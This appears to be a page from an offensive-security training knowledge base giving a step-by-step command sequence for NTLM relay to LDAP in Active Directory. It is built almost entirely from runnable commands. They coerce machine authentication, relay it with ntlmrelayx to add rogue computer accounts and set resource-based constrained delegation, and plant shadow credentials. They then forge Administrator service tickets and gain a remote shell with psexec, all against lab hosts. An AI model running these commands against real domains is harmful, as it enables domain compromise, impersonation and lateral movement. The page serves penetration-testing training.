Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Relay Attacks / Techqniues

NTLM to LDAP

NTLM relay to LDAP turns inbound authentication into directory modification. The highest-value outcomes are RBCD, shadow credentials, adding computers, adding group members, resetting passwords, and writing SPNs.

Check LDAP signing

ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=ootw,DC=local" "(cn=Directory Service)" ldapServerIntegrity msDS-Other-Settings

Interactive LDAPS relay

ntlmrelayx.py -t ldaps://dc01.ootw.local -i --remove-mic -smb2support

Inside the LDAP shell

help
whoami
add_computer ATTACKER01 Password123!
set_rbcd TARGET01$ ATTACKER01$

Non-interactive RBCD relay

ntlmrelayx.py -t ldaps://dc01.ootw.local --delegate-access --escalate-user 'ATTACKER01$' -smb2support

Trigger machine authentication

coercer coerce -d ootw.local -u student -p 'student' --target 10.10.10.201 --listener 10.10.10.100

RBCD follow-up

getST.py -spn 'cifs/target01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/ATTACKER01$:Password123!'
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass ootw.local/Administrator@target01.ootw.local -dc-ip 10.10.10.200

Shadow credentials relay

ntlmrelayx.py -t ldaps://dc01.ootw.local --shadow-credentials --shadow-target TARGET01$ -smb2support

Shadow credentials follow-up

certipy auth -pfx TARGET01.pfx -domain ootw.local -dc-ip 10.10.10.200

Add computer through relay

ntlmrelayx.py -t ldaps://dc01.ootw.local --add-computer 'ATTACKER02$' 'Password123!' -smb2support

Notes

Relay to LDAP is usually more valuable than relay to SMB because the result can become a durable AD primitive rather than a single shell.

LDAPS can still be relayable when channel binding is not enforced. If channel binding is required, many LDAPS relay paths fail.